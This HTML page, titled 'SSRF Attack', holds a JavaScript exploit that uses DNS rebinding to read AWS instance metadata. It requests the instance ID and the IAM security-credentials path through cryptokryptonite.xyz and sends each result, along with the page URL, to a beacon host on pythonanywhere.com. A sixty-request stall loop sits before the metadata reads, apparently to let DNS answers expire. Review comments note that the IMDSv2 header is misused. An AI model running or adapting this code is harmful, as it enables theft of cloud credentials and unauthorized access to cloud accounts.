<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>SSRF Attack</title>
</head>
<body>
<script>
// Host that receives the log() beacons (HTTPS GET /log?msg=...).
const logTimeServer = 'reporascal0.pythonanywhere.com';
// Host the IMDS-style paths (/latest/meta-data/...) are requested from over
// plain HTTP. NOTE(review): nothing in this file sets that host up, so it is
// presumably expected to resolve to the instance metadata address by the time
// those requests go out (DNS rebinding) — confirm with the serving side.
const attackServer = 'cryptokryptonite.xyz';
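function log(data) {
  // Best-effort, fire-and-forget beacon: `data` is coerced to a string and
  // shipped to the log host in the `msg` query parameter of an async GET.
  // No result is returned and failures are not reported.
  //
  // encodeURIComponent, not encodeURI: encodeURI leaves '&', '#', '=', '?'
  // and '+' untouched, so a message containing any of them (a URL with a
  // query string, an error text) would be cut off at the first '&'/'#'
  // or split into extra parameters on the receiving side.
  var sreq = new XMLHttpRequest();
  sreq.open('GET', 'https://' + logTimeServer + '/log?msg=' + encodeURIComponent(String(data)), true);
  sreq.send();
}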
function get(url) {
  // Synchronous GET of `url`. Returns the response body on HTTP 200, the
  // marker '[failed status=N]' for any other status, and null when the
  // request itself threw (the error is forwarded to the log host first).
  //
  // NOTE(review): X-Aws-Ec2-Metadata-Token-Ttl-Seconds only has meaning on
  // the PUT /latest/api/token request that mints an IMDSv2 token; sending it
  // on a plain GET does not satisfy IMDSv2, which wants the token itself in
  // X-aws-ec2-metadata-token. So this helper does not get past an instance
  // that requires IMDSv2 — such a GET should be rejected (401) — and the
  // original "For AWS IMDSv2" intent does not hold. It is also a
  // non-safelisted header, so the browser will CORS-preflight the request
  // unless `url` is same-origin with the page.
  let body = null;
  try {
    const xhr = new XMLHttpRequest();
    xhr.open('GET', url, false);
    xhr.setRequestHeader('X-Aws-Ec2-Metadata-Token-Ttl-Seconds', '21600');
    xhr.send(null);
    body = xhr.status === 200
      ? xhr.responseText
      : '[failed status=' + xhr.status + ']';
  } catch (err) {
    log(err);
  }
  return body;
}
// Report where the script ended up running.
log('Triggered in ' + window.location.href);

// Sixty blocking round-trips to the log host before the target is touched;
// the responses are discarded, so this is purely a stall.
// NOTE(review): presumably this is to let the cached DNS answer for
// attackServer expire before the GETs below (the usual DNS-rebinding wait) —
// confirm against the record TTL on the serving side.
for (let round = 0; round < 60; round += 1) {
  log('Loop ' + round);
  const ping = new XMLHttpRequest();
  ping.open('GET', 'https://' + logTimeServer + '/', false);
  ping.send();
}

// Read two IMDS-style paths from attackServer and forward whatever comes
// back (body, '[failed status=N]' or 'null'). With IMDSv2 required on the
// instance these token-less GETs are expected to fail rather than leak data.
log('Instance ID: ' + get('http://' + attackServer + '/latest/meta-data/instance-id'));
log('IAM Role: ' + get('http://' + attackServer + '/latest/meta-data/iam/security-credentials/'));
</script>
</body>
</html>